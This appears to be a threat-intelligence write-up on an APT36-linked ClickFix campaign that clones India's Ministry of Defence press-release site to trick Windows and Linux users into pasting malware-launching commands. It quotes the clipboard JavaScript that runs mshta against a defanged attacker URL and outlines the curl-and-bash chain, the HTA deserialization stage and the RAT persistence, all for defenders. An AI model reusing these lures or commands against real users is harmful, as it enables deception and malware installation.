On the sidelines tocyberattack from apt36 amid operation sindoor a retaliatory response onPahalgam Terror attack orchestrated by Pakistan the cyberattack campaign wasalso seen carried out by alleged TAG-140 that has overlaps with SideCopy,an operational subgroup assessed to be a sub-cluster or operational affiliateof Transparent Tribe (also tracked as APT36, ProjectM, or MYTHIC LEOPARD).Recentthreat activity highlights the continued use of official branding and visualimpersonation by threat actors to reduce user suspicion and facilitate malwaredeployment.

A campaign spoofing India’sMinistry of Defence employed a ClickFix-style infection chain to distributecross-platform malware. The malicious infrastructure replicated legitimategovernment press release formats, staged payloads via a potentially compromised.indomain, and leveraged visual deception to maintain credibility throughout theattack lifecycle.

This campaign reflects broadertrends observed in other ClickFix operations, notably the reuse of publicsector branding, hosting of malware in web asset directories, and targeting ofboth Windows and Linux systems to broaden operational reach and effectiveness.

Initial Access Vector: Spoofed Ministry Press Release Portal

During domain reconnaissancetargeting government-themed spoofing, Hunt.io identified the domain email.gov.in.drdosurvey[.]infodelivering content that impersonates India’s Ministry of Defence. When accessedvia a web browser, the domain presented a fraudulent page designed to closelymimic the Ministry’s legitimate press release archive, including a structurallysimilar layout and user interface.

URL Path Comparison

·      Legitimate: /index.php/en/press-releases-ministry-defence-0

·      Malicious: /content/press-releases-ministry-defence-0.html

The adversaries attempted toreplicate the Ministry’s historical press release archive, commonly listingdocuments from September 2023 to April 2025. However, only one hyperlinkcorresponding to March 2025 was functional on the spoofed page. The remainingentries displayed static placeholders marked "No Data," likely tomaintain visual authenticity while focusing user interaction on the activemalicious payload.

Analysis of the cloned portal’ssource code revealed that the site was generated using HTTrack, anopen-source website mirroring utility commonly used to duplicate legitimate webcontent. HTML metadata within the page source indicated the cloning activitylikely took place in early March 2025.

The threat actors reconstructedthe Ministry's public document archive, which typically indexes monthly pressreleases spanning September 2023 to April 2025. However, on the spoofed site,only a single hyperlink corresponding to March 2025 was functional; all otherentries displayed a static "No Data" message, suggesting theremainder of the content was either non-functional filler or intended purelyfor visual authenticity.

ClickFix TechniqueObservations

Interaction with the sole active link on thecloned press release portal—labeled “March 2025” triggers a ClickFix-stylesocial engineering sequence. Upon selection, the user is redirected to one oftwo server-side PHP scripts based on their operating system:

·      Windows: /captcha/windows.php

·      Linux: /captcha/linux.php

This OS-aware branching behavior aligns withknown ClickFix tactics, which tailor payload delivery and deception techniquesto the target environment to increase the likelihood of successful execution.

Linux Flow: CAPTCHA Lure and Shell Command Execution

The Linux-specific page (/captcha/linux.php)displays a minimalistic interface featuring a single blue button labeled "I'mnot a rebot"—a misspelling of "robot" that may be either anunintentional typographical error or a deliberate obfuscation tactic designedto evade automated detection and signature-based scanning.

Upon clicking the deceptiveCAPTCHA button, a shell command is silently copied to the user’s clipboard. Ifpasted and executed in a terminal, the command retrieves a shell script named mapeal.shfrom https://trade4wealth[.]in/admin/assets/js/, assignsexecute permissions using chmod +x, and immediately initiatesexecution. The domain trade4wealth[.]in used to host anddeliver the payload, is assessed to be either compromised or abandoned, and haslikely been repurposed to support malicious infrastructure.

Following the clipboard action,the user is redirected to linux-guide.php, which displays averification overlay accompanied by step-by-step instructions designed tosocially engineer execution of the script:

1.      PressALT + F2

2.      PressCTRL + V

3.      PressEnter

The redirected page (linux-guide.php)represents the next stage of the ClickFix infection chain. It features aspoofed CAPTCHA overlay accompanied by step-by-step instructions designed todeceive users into executing the previously copied shell command from theirclipboard.

Behind the overlay, thebackground consists of a static image that faintly displays a watermark from PCRisk,a legitimate cybersecurity information platform known for publishing threatanalysis and malware removal guides. This visual element may serve as a socialengineering tactic, intended to mimic a trustworthy security interface andreduce user skepticism during the execution process.

As of this writing, analysis ofthe Linux payload (mapeal.sh) reveals no overtlymalicious behavior. Upon execution, the script simply downloads a JPEG imagefrom the same hosting directory (https://trade4wealth[.]in/admin/assets/js/)and opens it in the background. No evidence of persistence mechanisms, systemmodification, network communication, or lateral movement was observed duringdynamic analysis.

Windows Flow:FOUO Warning and mshta-Based Payload Delivery

On Windows systems, clickingthe active "March 2025" link redirects users to /captcha/windows.php,which displays a full-screen overlay simulating a government disclosure noticelabeled “For Official Use Only (FOUO)”. This spoofed interface isdesigned to create a false sense of legitimacy and urgency, consistent withsocial engineering tactics commonly employed in ClickFix-style campaigns.

The background of the pagefeatures a blurred screenshot of the legitimate yoga.ayush.gov[.]inportal, an official site maintained by India’s Ministry of AYUSH to promoteyoga and wellness initiatives. This visual mimicry likely aims to reinforcetrust by associating the page with a recognized government domain.

Upon clicking the Continuebutton on the spoofed FOUO overlay, the user is transitioned into the secondphase of the ClickFix infection chain. A JavaScript function is executedclient-side, silently copying a malicious command to the user’s clipboard. Thiscommand leverages mshta.exe to invoke a remote HTA (HTMLApplication) script hosted on attacker-controlled infrastructure:

const calcPath ="C:\\Windows\\System32\\mshta.exehttps://trade4wealth[.]in/admin/assets/css/default/index.php";navigator.clipboard.writeText(calcPath);

The user is then sociallyengineered typically through on-screen instructions to paste and execute thecommand in a terminal or Run dialog, initiating the malicious payload delivery.

When accessed directly, the index.phpendpoint performs a redirect to the actual second-stage payload:

https://trade4wealth[.]in/admin/assets/css/default/sysinte.hta

This HTA file contains severalhundred lines of heavily obfuscated JScript, utilizing hexadecimal escapesequences and encoded logic structures designed to impede static code analysisand delay reverse engineering efforts.

After some de-obfuscation weget to see the main logic of this malicious HTA JScript:

-         At first, this initializes a huge array of hexbytes, then moves on to set the preferred available .NET runtime version forfurther execution in Process environment variable.

-         Then base64 decodes and converts to MemoryStream and passes to BinaryFormatter.Deserialize_2():

o   Initially,It tries disabling .NET type-safety checks that would normally prevent deserialization of dangerousobjects.

o   eventuallywill try to deserialize the decoded serializes payload from memory stream prollycreated using tools like ysoserial,ysoserial.net thatexploits the unsafe .NET object deserialization. In this case theActivitySurrogateSelector Gadget was used that eventually loads the constructorof ExploitClass class.

When take a look atdeserialized object in DIE, we see a region hinting .NET Assembly is present,

Which can further be confirmedfrom a hex viewer application, you can see the “MZ” header present after theserialized object header.

When extracted and loaded in .Netdecompiler, we see that it’s named after BroaderAspect and a DLL file, and theconstructor is defined that’ll trigger the moment dll is loaded.

Moving on, this reaches outanother url, that holds another huge chunk of encoded bytes, which is thenbase64 decoded, then gzip decompressed to again base64 decode, then saved underthe “C:\Users\Public\USOShared-1de48789-1285” under disguised and misleadingname and extension of “zuidrt.pdf”.  

Also it does some low effortpersistence by creating batch file “noway.bat” that holds the instruction toregister a AutoRun Key which launches this file every time the computer boots:

Turns out it’s an another PE32file written using Delph which is a DRAT malware:

And checking the Virus totalconfirms the same:

This RAT initiates outboundcommunication to the IP address 185.117.90[.]212. This IP is associatedwith a spoofed subdomain: email.gov.in.avtzyu[.]store, designed to mimicofficial Indian government infrastructure and enhance the credibility ofnetwork traffic.

Operator Traits and Attribution

Several consistent characteristics observedthroughout this campaign provide valuable indicators for defenders to identifyrelated malicious infrastructure and anticipate potential future stagingactivity:

·      Domain Naming Conventions: Use of domainsmimicking official Indian government subdomains particularly variations of email.gov[.]inappended to attacker-controlled parent domains such as drdosurvey[.]infoand avtzyu[.]store.

·      Registrar and DNS Infrastructure:Registration of domains via Namecheap and utilization of registrar-servers[.]comnameservers, both of which are frequently exploited in malicious operations dueto their relatively lax oversight.

·      Payload Hosting Tactics: Deployment ofHTA payloads deeply nested within URL paths that mimic benign directorystructures, aiding in evasion of casual inspection and automated detection.

·      Spelling and Linguistic Anomalies:Presence of deliberate or inadvertent misspellings (e.g., “I’m not a rebot” and“officia use only”) likely employed as obfuscation measures to evadepattern-based detection systems or to maintain plausible user familiarity.

·      Cross-Platform Execution Techniques: Useof clipboard-based command injection methods enabling payload delivery acrossboth Windows (via mshta.exe)and Linux (curl+ chmod+x + bash)environments, demonstrating operational flexibility and broad targeting scope.

These traits collectively aid in attributingthe activity and crafting targeted defensive measures against evolving ClickFixcampaigns.

AttributionAssessment

Although definitiveattribution remains unconfirmed, the tactics, techniques, and procedures (TTPs)observed in this campaign, such as the use of government-themed lure content,HTA-based payload delivery, deployment of decoy documents, and targeted focuson Indian government infrastructure align closely with historically documentedactivity attributed to APT36 (also known as Transparent Tribe).

APT36 is a Pakistan-alignedadvanced persistent threat actor characterized by:

·      A longstanding operational focus on Indiangovernment, military, and diplomatic entities.

·      Frequent deployment of .NET-based malwarecombined with HTA payload delivery mechanisms.

·      Use of cloned official content, including loginportals and press release archives, for social engineering.

·      Infrastructure exhibiting common traits such astyposquatting, exploitation of legitimate services, and publicly visiblescripting errors.

Given these significantoverlaps, this campaign is assessed with medium confidence to beconsistent with APT36’s broader targeting objectives and operationalmethodologies.

Indicatorsof Compromise (IOCs)

MITREATT&CK TTPs